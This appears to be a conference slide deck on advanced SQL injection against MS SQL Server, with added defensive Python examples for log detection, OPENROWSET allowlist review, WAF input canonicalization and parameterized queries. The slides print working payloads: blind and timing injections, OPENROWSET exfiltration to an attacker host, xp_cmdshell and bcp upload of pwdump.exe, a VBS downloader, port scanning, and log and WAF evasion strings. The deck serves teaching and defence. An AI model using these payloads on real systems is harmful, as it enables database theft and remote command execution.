Advanced SQLi and Evasion Techniques
About Me
Introduction
Damian Profancik | Technical Lead/Security Services Leader @ Apparatus
@integrisec
Credit
Cesar Cerrudo – CTO, IOActive Labs
o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf
ModSecurity Team – Trustwave SpiderLabs
o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html
Avi Douglen – OWASP Board Member, Israel
o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
SQL Injection Basics
• Dynamic construction of SQL queries
"SELECT * FROM table WHERE user = '" + uname + "' AND pwd = '" + pword + "'"
• Unsanitized user input
uname = ' or 1=1-- => SELECT * FROM table WHERE user = '' or 1=1--' AND pwd = ''
• Excessive permissions
o Web services running as privileged user with db_owner rights
o Connecting to database using sa, dbo, or sysadmin accounts
o Lax file system permissions
Advanced SQLi Techniques
• Blind SQL Injection
• Data Exfiltration
• Privilege Escalation
• Command Execution
• Uploading Files
• Internal DB Server Exploration
• Port Scanning
• Firewall Evasion
• Log Evasion
• WAF Evasion
Blind SQL Injection
Blind SQL Injection
• Differential Analysis
Example:
http://www.someforum.com/posts.php?id=2
SELECT author, title, body FROM posts WHERE ID = 2
http://www.someforum.com/posts.php?id=2 and 1=2
SELECT author, title, body FROM posts WHERE ID = 2 and 1=2
http://www.someforum.com/posts.php?id=2 and 1=1
SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
Blind SQL Injection (cont.)
• Database Management System Fingerprinting
o System Functions
• MS SQL Server = getdate()
• MySQL = now()
• Oracle = sysdate()
• Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate()
o String Concatenation
• MS SQL Server = +
• MySQL = +, CONCAT()
• Oracle = ||, CONCAT()
• Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st'
o Query Chaining
• MS SQL Server, MySQL = allows chaining with semicolon
• Oracle = does NOT allow chaining with semicolon
• Example: http://www.someforum.com/posts.php?id=2; commit --
Blind SQL Injection (cont.)
• Timing Attacks
o Adding delay
• SQL Server = WAITFOR DELAY '0:0:10'
• MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds'))
• PostgreSQL = pg_sleep(10)
• Oracle = Union with query that contains a lot of results
o SELECT IF(condition, true, false)
Example:
…1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;
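The probes above leave a recognisable trace in web server logs, which is where a defender meets them. The following is an added detection example (not code from the deck): it parses constructed Combined Log Format lines, URL-decodes the parameters, and flags a client that requested the same resource with both a tautology (`and 1=1`) and a contradiction (`and 1=2`), as well as any request that calls the fingerprinting or delay functions listed on the slides. The IPs, paths and timestamps in the sample are made up.

```python
"""Spot blind-SQLi probing in web access logs.

Added example for this deck (not the author's code). Differential analysis
leaves a characteristic trace: the same resource requested by one client with
a tautology (``and 1=1``) and a contradiction (``and 1=2``). Fingerprinting
and timing probes call the DBMS functions named on the slides (getdate(),
now(), sysdate, WAITFOR DELAY, BENCHMARK, pg_sleep). The log lines below are
constructed in Combined Log Format; the IPs and paths are made up.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/2012:10:00:01 +0000] "GET /posts.php?id=2 HTTP/1.1" 200 5120
10.0.0.5 - - [12/Apr/2012:10:00:02 +0000] "GET /posts.php?id=2%20and%201%3D2 HTTP/1.1" 200 310
10.0.0.5 - - [12/Apr/2012:10:00:03 +0000] "GET /posts.php?id=2%20and%201%3D1 HTTP/1.1" 200 5120
10.0.0.9 - - [12/Apr/2012:10:00:04 +0000] "GET /posts.php?id=2%20and%20getdate()%3Dgetdate() HTTP/1.1" 200 5120
10.0.0.9 - - [12/Apr/2012:10:00:05 +0000] "GET /posts.php?id=2%3B%20WAITFOR%20DELAY%20'0:0:10' HTTP/1.1" 200 5120
10.0.0.7 - - [12/Apr/2012:10:00:06 +0000] "GET /posts.php?id=7 HTTP/1.1" 200 4870
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d+) (?P<size>\d+)$')
# "and 1=1" / "and 1=2": the same number on both sides is a tautology.
TAUTOLOGY_RE = re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*(\d+)", re.I)
# Delay calls and date-function self-comparisons from the slides.
PROBE_FUNC_RE = re.compile(
    r"(?:waitfor\s+delay|benchmark\s*\(|pg_sleep\s*\(|"
    r"(?:getdate|now|sysdate)\s*(?:\(\s*\))?\s*=\s*(?:getdate|now|sysdate))", re.I)


def parse_line(line):
    """Parse one log line into a dict; query parameters are URL-decoded per key."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the set of probe labels present in any parameter of one request."""
    labels = set()
    for values in rec["params"].values():
        for value in values:
            m = TAUTOLOGY_RE.search(value)
            if m:
                labels.add("tautology" if m.group(1) == m.group(2) else "contradiction")
            if PROBE_FUNC_RE.search(value):
                labels.add("dbms-function")
    return labels


def find_probes(log_text):
    """Flag dbms-function calls per request and tautology/contradiction pairs per (client, path)."""
    per_client = defaultdict(set)
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        labels = classify(rec)
        per_client[(rec["ip"], rec["path"])] |= labels
        if "dbms-function" in labels:
            findings.append((rec["ip"], rec["path"], "dbms-function-probe"))
    for (ip, path), labels in per_client.items():
        if {"tautology", "contradiction"} <= labels:
            findings.append((ip, path, "boolean-differential-probe"))
    return findings


if __name__ == "__main__":
    for finding in find_probes(SAMPLE_LOG):
        print(*finding)
```

On the sample, 10.0.0.5 is reported once for the boolean pair and 10.0.0.9 twice for function-based probes; 10.0.0.7 is not reported. In practice the tautology/contradiction pairing should be windowed by time, since a single client will be seen for many paths over a long log.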
Attacking MS SQL Server
Linked and Remote Servers
• OPENROWSET
Example:
SELECT * FROM OPENROWSET( 'SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table' )
• OPENDATASOURCE
Example:
SELECT * FROM OPENDATASOURCE( 'SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' )
.DatabaseName.dbo.TableName
Data Exfiltration
• Remote server INSERT
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table1')
SELECT * FROM table2
Data Exfiltration (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysdatabases')
SELECT * FROM master.dbo.sysdatabases
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysobjects')
SELECT * FROM databasename.dbo.sysobjects
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _syscolumns')
SELECT * FROM databasename.dbo.syscolumns
Data Exfiltration (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table1')
SELECT * FROM databasename..table1
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table2')
SELECT * FROM databasename..table2
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysxlogins')
SELECT * FROM databasename.dbo.sysxlogins
Privilege Escalation
• Known vulnerabilities
Example:
SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation
Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt
• Often not required
o Connection strings using SA, dbo, sysadmin
o Web service context
Command Execution
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM temp_table')
EXEC master.dbo.xp_cmdshell 'dir'
Uploading Files
On attacker's server…
1. CREATE TABLE AttackerTable (data text)
2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')
On victim’s server…
3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d'
4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','AttackersAlias','REG_SZ','DBMSSOCN,AttackersIP,80'
5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -Usa -Ppwn3d'
Uploading Files (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM temp_table')
EXEC xp_cmdshell '"first script line" >> script.vbs'
…
EXEC xp_cmdshell '"second script line" >> script.vbs'
...
EXEC xp_cmdshell '"last script line" >> script.vbs'
EXEC xp_cmdshell 'script.vbs' ==> execute script to download binary
Internal DB Server Exploration
• Linked and Remote Servers
1. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysservers')
SELECT * FROM master.dbo.sysservers
2. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysservers')
SELECT * FROM linkedserver1.master.dbo.sysservers
3. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysdatabases')
SELECT * FROM linkedserver1.master.dbo.sysdatabases
4. Rinse and repeat…
Port Scanning
Example:
SELECT * FROM OPENROWSET('SQLOLEDB',
'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5',
'SELECT * FROM table')
Evasion Techniques
Firewall Evasion
• Use port 80 for outbound
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;',
'SELECT * FROM table1')
SELECT * FROM table2
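Every OPENROWSET and OPENDATASOURCE call from the exfiltration, exploration, port-scanning and firewall-evasion slides carries a provider connection string whose `Address=host,port` names where the database server will connect out to. That string is the defender's handle on the whole family. The following is an added review example (not code from the deck): given T-SQL statements captured from the server (trace, Extended Events or a database-firewall feed; the capture mechanism is assumed), it extracts each destination and compares it with an allowlist of known linked servers, flagging hosts outside the list and non-1433 ports such as the port-80 variant above. The allowlist, hostnames and statements are constructed; addresses are from the TEST-NET range.

```python
"""Review captured T-SQL for ad hoc distributed queries to unexpected hosts.

Added example, not from the deck. OPENROWSET / OPENDATASOURCE calls carry a
provider connection string with ``Address=host,port``; this extracts each
target and checks it against an allowlist of known linked servers. The
allowlist, hostnames and sample statements are constructed; the addresses
are from the TEST-NET range.
"""
import re

ADHOC_RE = re.compile(
    r"\b(OPENROWSET|OPENDATASOURCE)\s*\(\s*'([^']*)'\s*,\s*'([^']*)'", re.I)
ADDRESS_RE = re.compile(r"Address=([^,;]+)(?:,(\d+))?", re.I)
SQL_PORT = 1433
ALLOWED_TARGETS = {("reporting-db.corp.example", SQL_PORT)}   # constructed allowlist

CAPTURED = [  # constructed statements in the shapes the slides use
    "SELECT * FROM OPENROWSET('SQLOLEDB', 'uid=rpt;pwd=x;Network=DBMSSOCN;Address=reporting-db.corp.example,1433;', 'SELECT 1')",
    "INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=203.0.113.10,1433;', 'SELECT * FROM table1') SELECT * FROM table2",
    "INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=203.0.113.10,80;', 'SELECT * FROM table1') SELECT * FROM table2",
    "SELECT * FROM OPENDATASOURCE('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=203.0.113.10,1433;').DatabaseName.dbo.TableName",
    "SELECT name FROM sys.objects",
]


def extract_targets(sql):
    """Return dicts (function, provider, host, port) for each ad hoc call in a statement."""
    targets = []
    for m in ADHOC_RE.finditer(sql):
        func, provider, conn = m.groups()
        addr = ADDRESS_RE.search(conn)
        host = addr.group(1).strip() if addr else None
        # No explicit port in the connection string means the default SQL port.
        port = int(addr.group(2)) if addr and addr.group(2) else SQL_PORT
        targets.append({"function": func.upper(), "provider": provider,
                        "host": host, "port": port})
    return targets


def review(sql):
    """Return (function, host, port, verdict) tuples for one statement."""
    verdicts = []
    for t in extract_targets(sql):
        if t["host"] is None:
            verdict = "no-address"        # local or named instance: still review by hand
        elif (t["host"], t["port"]) in ALLOWED_TARGETS:
            verdict = "allowed"
        elif t["port"] != SQL_PORT:
            verdict = "nonstandard-port"  # e.g. 80: the firewall-evasion pattern
        else:
            verdict = "unexpected-host"
        verdicts.append((t["function"], t["host"], t["port"], verdict))
    return verdicts


def review_batch(statements):
    """Flatten review() over a list of captured statements."""
    return [v for sql in statements for v in review(sql)]


if __name__ == "__main__":
    for verdict in review_batch(CAPTURED):
        print(*verdict)
```

The same extraction can drive an egress-filter check: if the server has no business reaching anything but the allowlisted hosts on 1433, the firewall rule and this review should agree. Disabling ad hoc distributed queries altogether (the DisallowAdhocAccess setting on the Prevention slide) removes the capability rather than just watching it.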
Log Evasion
• Inject using POST parameters
• Long HTTP requests
o IIS truncates requests longer than 4097 characters
o Sun-One Application Server truncates at 4092 characters
Example:
http://www.someforum.com/posts.php?param=<4097 x 'a'>&id=2 or 1=1--
WAF Evasion
• Comments
o # = single line comment
o -- = single line comment
o /* */ = inline, multi-line comment
o /*! */ = MySQL-specific inline, multi-line comment
Example:
http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
• New line
o %0D%0A = URL-encoded newline
o %0B = URL-encoded vertical separator
Example:
http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
WAF Evasion (cont.)
• Character Encoding
o Unicode (U+02BC = ʼ)
o CHAR()
o Hexadecimal
o URL-encoding
o Double Encoding
Example:
Double Encoding:
URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM…
WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%252a%2fECT * FROM…
Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
WAF Evasion (cont.)
• Concatenation
o EXEC()
o Split/Join
o Special Characters (e.g. '[', '+', '%', etc.)
Example:
Split/Join:
URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users
WAF = id=SELECT name
id=password FROM users
ASP/ASP.Net = id=SELECT name,password FROM users
Special Characters:
URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users
WAF = id=SEL%ECT name,password FR%OM users
ASP/ASP.Net = id=SELECT name,password FROM users
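Each evasion on the WAF slides works because the WAF inspects different bytes from the ones the application and DBMS finally parse. The defender's answer is to canonicalize before matching. The following is an added example (not code from the deck or from the ModSecurity project): a normalizer that URL-decodes repeatedly (double encoding), drops `%` signs that do not start a valid escape (the slide's `FR%OM` case), joins duplicate parameters with a comma as the slide says ASP/ASP.Net does, removes `/* */`, `/*! */`, `--` and `#` comments, folds CR, LF and vertical tab into a space, and only then runs a few signatures. The ASP joining and malformed-escape behaviour are modelled on the slides rather than on a measured implementation, and the signatures and sample query strings are constructed.

```python
"""Canonicalize request parameters before signature matching.

Added example, not code from the deck or from the ModSecurity project. The
ASP-style joining of duplicate keys and the dropping of malformed '%' escapes
are modelled on the slides, not on a measured implementation; the signatures
and sample query strings are constructed.
"""
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3
MALFORMED_ESCAPE_RE = re.compile(r"%(?![0-9A-Fa-f]{2})")
INLINE_COMMENT_RE = re.compile(r"/\*!?.*?\*/", re.S)
LINE_COMMENT_RE = re.compile(r"(?:--|#).*$", re.S)
WHITESPACE_RE = re.compile(r"\s+")          # \s covers CR, LF, tab and vertical tab
SIGNATURES = {
    "union-select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b"),
    "select-from": re.compile(r"\bSELECT\b.+\bFROM\b"),
    "tautology": re.compile(r"\b(?:OR|AND)\s+\d+\s*=\s*\d+"),
}


def decode_repeatedly(value, rounds=MAX_DECODE_ROUNDS):
    """URL-decode until stable (bounded), so %252f and %2f both end up as '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def raw_pairs(query):
    """Split a query string on '&' and '=' without decoding, keeping duplicate keys."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def canonicalize(value):
    """Reduce one parameter value to the form a SQL parser would effectively see."""
    value = decode_repeatedly(value)
    value = MALFORMED_ESCAPE_RE.sub("", value)      # FR%OM -> FROM
    value = INLINE_COMMENT_RE.sub("", value)        # UN/**/ION -> UNION
    value = LINE_COMMENT_RE.sub("", value)          # drop everything after -- or #
    value = WHITESPACE_RE.sub(" ", value).strip()   # UNION\r\nSELECT -> UNION SELECT
    return value.upper()


def normalize_query(query):
    """Return {key: canonical value}, joining repeated keys with ',' (ASP-style)."""
    grouped = {}
    for key, value in raw_pairs(query):
        grouped.setdefault(decode_repeatedly(key), []).append(value)
    return {key: canonicalize(",".join(values)) for key, values in grouped.items()}


def inspect(query):
    """Sorted list of signature names that fire on any canonicalized parameter."""
    hits = set()
    for value in normalize_query(query).values():
        hits.update(name for name, pattern in SIGNATURES.items() if pattern.search(value))
    return sorted(hits)


if __name__ == "__main__":
    for q in ("id=2",
              "id=2%20UN%252f%252a%252a%252fION%20SEL%252f%252a%252a%252fECT%20*%20FROM%20users",
              "id=SELECT%20name&id=password%20FROM%20users"):
        print(q, "->", normalize_query(q), inspect(q))
```

The decode loop is bounded on purpose: an unbounded "decode until stable" loop is itself a denial-of-service handle. Inline comments are removed rather than replaced by a space because the point of `UN/**/ION` is that the attacker expects the parser to see `UNION`; the signature must see the same thing.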
SQL Injection Prevention
SQLi Prevention
• Sanitize User Input
o Normalize Input
o Whitelists
o Built-in Functions
o Regular Expressions
o Trust NO data source (e.g. Cookies, Referer, User-Agent, etc.)
• Prepared Statements/Parameterized Queries
• Stored Procedures
• Accounts with Least Privilege
• Enable DisallowAdhocAccess registry setting for MS SQL Server
• Perform Self Assessments
• Use a Web Application Firewall
• Filter Outbound Traffic at Firewall
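The concatenated login query from the SQL Injection Basics slide and the prepared-statement and whitelist bullets above fit in one worked example. The following is added code, not the deck's, with sqlite3 standing in for the DBMS: `lookup_dynamic` builds the statement by string concatenation exactly as the basics slide shows, `lookup_parameterized` sends the same statement with placeholders so the driver treats `' or 1=1--` as data, and `validate_username` is the whitelist step that rejects the input before it reaches a driver at all. The table contents and the username character set are constructed.

```python
"""Dynamic SQL versus a parameterized query, on the deck's login example.

Added example, not from the deck; sqlite3 stands in for the DBMS. The table
rows and the whitelist pattern are constructed.
"""
import re
import sqlite3

USERNAME_RE = re.compile(r"^[A-Za-z0-9_.]{1,32}$")   # constructed whitelist


def build_db():
    """In-memory users table with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def lookup_dynamic(conn, uname, pword):
    """Vulnerable: the slide's concatenated query. The input becomes part of the SQL."""
    sql = "SELECT * FROM users WHERE user = '" + uname + "' AND pwd = '" + pword + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, uname, pword):
    """Hardened: placeholders; the driver binds the input as a value, never as SQL."""
    sql = "SELECT * FROM users WHERE user = ? AND pwd = ?"
    return conn.execute(sql, (uname, pword)).fetchall()


def validate_username(uname):
    """Whitelist check: only the characters a username is allowed to contain."""
    return bool(USERNAME_RE.match(uname))


def demo():
    """Run both lookups with the slide's payload and a legitimate login."""
    conn = build_db()
    payload = "' or 1=1--"
    return {
        "dynamic_rows": len(lookup_dynamic(conn, payload, "")),          # every row
        "parameterized_rows": len(lookup_parameterized(conn, payload, "")),  # none
        "whitelist_accepts_payload": validate_username(payload),
        "legit_rows": len(lookup_parameterized(conn, "alice", "s3cret")),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Under concatenation the payload turns the WHERE clause into `user = '' or 1=1--' AND pwd = ''` and every row comes back; with placeholders the same string is compared against the `user` column literally and matches nothing. The whitelist rejects it earlier still, which is the layer that also protects any code path that cannot use parameters (for instance a dynamically chosen table or column name).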
Q & A